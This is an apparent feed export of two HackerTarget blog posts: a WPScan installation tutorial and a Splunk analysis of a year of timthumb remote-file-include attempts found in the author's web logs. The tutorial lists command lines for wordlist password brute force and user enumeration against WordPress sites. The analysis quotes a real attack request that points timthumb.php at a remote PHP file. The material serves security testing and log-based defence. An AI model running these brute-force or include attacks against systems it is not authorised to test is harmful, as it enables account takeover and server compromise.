wpscan – HackerTarget.com https://hackertarget.com Security Vulnerability Scanners and Assessments Tue, 25 Feb 2020 05:17:22 +0000 en-US hourly 1 https://wordpress.org/?v=5.5.12 WPScan Install on Ubuntu https://hackertarget.com/wpscan-install-ubuntu/ Wed, 06 Nov 2013 12:01:08 +0000 http://hackertarget.com/?p=5465 WPScan can test a WordPress installation for security vulnerabilities. The tool is a black box scanner, it allows remote testing of a WordPress installation. Find vulnerable plugins and themes, security configuration issues and attack users by brute forcing passwords. Installation on Ubuntu Linux is pretty straight forward and you will be up and running in […]

The post WPScan Install on Ubuntu appeared first on HackerTarget.com.

]]>
WPScan project page

WPScan can test a WordPress installation for security vulnerabilities. The tool is a black box scanner, it allows remote testing of a WordPress installation. Find vulnerable plugins and themes, security configuration issues and attack users by brute forcing passwords.

Installation on Ubuntu Linux is pretty straight forward and you will be up and running in a few minutes. Alternatively you could try using Kali Linux a pre-built penetration testing Linux distribution that comes with WPScan pre-installed.

Install Steps for WPScan on Ubuntu

If you do not have git installed, you will need it. Git is a tool that allows easy access for installation and updates to a code repository.

apt-get install git

Now for a few prerequisites.....

sudo apt-get install libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential libgmp-dev zlib1g-dev

Now to use git you clone the main branch of WPScan code, this will create a folder on your system with the code.

git clone https://github.com/wpscanteam/wpscan.git

cd wpscan

sudo gem install bundler && bundle install --without test development

To launch the wpscan.rb launch it with ruby.

ruby wpscan.rb
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                    Version v2.1r2d5a770
     Sponsored by the RandomStorm Open Source Initiative
 @_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_
_______________________________________________________________


Examples :

-Further help ...
ruby wpscan.rb --help

-Do 'non-intrusive' checks ...
ruby wpscan.rb --url www.example.com

-Do wordlist password brute force on enumerated users using 50 threads ...
ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50

-Do wordlist password brute force on the 'admin' username only ...
ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin

-Enumerate installed plugins ...
ruby wpscan.rb --url www.example.com --enumerate p

-Enumerate installed themes ...
ruby wpscan.rb --url www.example.com --enumerate t

-Enumerate users ...
ruby wpscan.rb --url www.example.com --enumerate u

-Enumerate installed timthumbs ...
ruby wpscan.rb --url www.example.com --enumerate tt

-Use a HTTP proxy ...
ruby wpscan.rb --url www.example.com --proxy 127.0.0.1:8118

-Use a SOCKS5 proxy ... (cURL >= v7.21.7 needed)
ruby wpscan.rb --url www.example.com --proxy socks5://127.0.0.1:9000

-Use custom content directory ...
ruby wpscan.rb -u www.example.com --wp-content-dir custom-content

-Use custom plugins directory ...
ruby wpscan.rb -u www.example.com --wp-plugins-dir wp-content/custom-plugins

-Update ...
ruby wpscan.rb --update

-Debug output ...
ruby wpscan.rb --url www.example.com --debug-output 2>debug.log

See README for further information.

No argument supplied

Like any vulnerability scanner that uses signatures or known issues as part of its detection capability WPScan needs to be updated on a regular basis. Thankfully the WPScan team update it on a regular basis.

Update WPScan

To update simply launch a git pull command from within the installation directory.

cd wpscan
git pull

Enumerate & Discover

Free WordPress
Security Review

Need an expert? Professional WordPress Security Assessments.

Independent Expert Advice.

The post WPScan Install on Ubuntu appeared first on HackerTarget.com.

]]> There are no WordPress Timthumb Hackers in Mongolia https://hackertarget.com/feed-splunk-timthumb-attacks/ Thu, 07 Feb 2013 12:40:45 +0000 http://hackertarget.com/?p=4099 What is Timthumb? Back in August 2011, a serious vulnerability was discovered in many popular WordPress themes and Plugins. The code enabled automatic thumbnail creation when publishing with the WordPress content management system. While not a part of the WordPress core, the code had been reused by many developers, including both commercial and free theme […]

The post There are no WordPress Timthumb Hackers in Mongolia appeared first on HackerTarget.com.

]]>
What is Timthumb?

Back in August 2011, a serious vulnerability was discovered in many popular WordPress themes and Plugins. The code enabled automatic thumbnail creation when publishing with the WordPress content management system. While not a part of the WordPress core, the code had been reused by many developers, including both commercial and free theme builders.

The critical vulnerability is a remote file include (RFI) which allows an attacker to have the thumb.php code include additional code to execute PHP on the web server. An attacker attempts to use this vulnerability to execute commands on the web server.

So widespread was the vulnerability that attackers have been compromising WordPress installations for the past 18 months and continue to do so. Just yesterday, my OSSEC host-based intrusion detection system alerted me to continued attempts at exploiting the timthumb vulnerability.

Example

Below is an attack example from my logs. Note the WordPress path being attempted, the theme name, and the ?src= is the URL of the remote include PHP code.

61.246.x.x - - [02/Feb/2013:18:33:28 +0000] "GET /wordpress-themes-in-top-1-million-websites/wp-content/themes/suffusion/timthumb.php?src=http://picasa.com.c        t.ro/wordpress.php HTTP/1.1" 404 36 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"

Anyone who has patched the vulnerability with updated code is not affected by these ongoing attempted attacks. They simply fill your web server log files with attempts to execute thumb.php on various common paths resulting in 404 not found errors.

What is Splunk?

If your job involves looking at logs, spend some cycles playing with the Splunk Search engine. It is a commercial product but comes in a free version that allows you to consume 500mb of logs per day. Great for performing ad-hoc analysis or small to mid-size projects.

To perform some simple analysis of my web server logs to view the frequency, sources and attempts to exploit this timthumb vulnerability, I have turned to Splunk.

Feeding Splunk a year of Timthumb Attacks

Timthumb Events per month over 1 year

To begin, I installed Splunk and fed it a single file. The file contained 12 months worth of logs from my Nginx web server. I used grep to only feed log entries that included thumb in the path and resulted in a 404 not found. In other words, every log event that I have in my Splunk instance is a single attempt to exploit the timthumb vulnerability.

Since the data in my Splunk instance is only made up of timthumb exploit attempts, the initial search string shows all the attempts per month over the 12 months.

source="/home/fred/nginx-logs/access-complete-thumb.txt"

It is clear from this simple query that even though the initial vulnerability was released in August 2011, there was a major jump in the number of attacks against my server from July 2012. The reason for the increased number of attempts appears to be an increase in the tested paths of the timthumb code (more known bad themes). These lists are then included in the attack scripts.

Where did the attacks come from?

Using the Splunk GeoIP APP it is a simple matter to determine where the attacks are coming from. Once you have the base lookup working, Splunk makes it easy to chart the results of the top countries or cities.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | lookup geoip clientip | top 20 client_country
This query shows the Top 20 countries for total number of attacks.

Since some of these IP addresses are sending thousands of attempts, I take a closer look at the number of unique IP addresses by location. Instead of a simple chart, I use the Google Map APP that allows the geolocations to be plotted onto a Google Map. Using a map takes this visualization to the next level. A great way to impress the boss with a couple of clicks!!

From a quick look at the map it is apparent that there are no timthumb hackers in Mongolia.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | stats count by clientip | geoip clientip

Top attacking IP Addresses

Piping the search into top 20 clientip shows the top attacking IP address as 178.25.214.92 with 2445 events. Click on the IP address and it easy to see all attempts from this IP occurred during an 8 minute window on the 30th of August 2012. Whois shows this IP address is a broadband connection in Germany.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | top 20 clientip

source="/home/fred/nginx-logs/access-complete-thumb.txt" clientip="178.25.214.92"

Most Attacked WordPress Themes

To extract the most popular themes that are being attacked I used a regex on /wp-content/themes/ to get the theme path. Many of the attacked themes in the top 20 correlate with the most popular WordPress themes in the Top 1 million websites.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | rex field=_raw "wp-content\/themes\/(?[\w\-]*)" | top 20 wptheme

Looking at the most attacked WordPress themes, I discovered some attacks were not "blind" attempts. They were targeted against my theme that I have on a non-standard path. This indicates my site was explicitly targeted either manually after extraction of the path from the HTML source of my page or by a script parsing the HTML for those attempts. 31 different IP addresses had a go at my non-default theme path. In the top 5, I found 3 web hosting net blocks (Sweden, Germany and the USA), a Greek university and two Tor exit nodes.

source="/home/fred/nginx-logs/access-complete-thumb.txt" uri_path="/wp-content/themes/delegate2.3/functions/thumb.php" | top clientip

I have only scratched the surface of what is possible when using Splunk to analyse your web logs for attacks and other issues. Install it, start playing, and you will not be disappointed. For those who are wary of the Splunk price tag for larger amounts of data, I suggest taking a look at ELSA and GreyLog2. Both are open source log management systems that seem promising and are developing rapidly.

Hosted Security Scanners
& Tools

Test WordPress, Servers & Networks

WordPress Security Assessments

Independent Expert Advice.

The post There are no WordPress Timthumb Hackers in Mongolia appeared first on HackerTarget.com.

]]>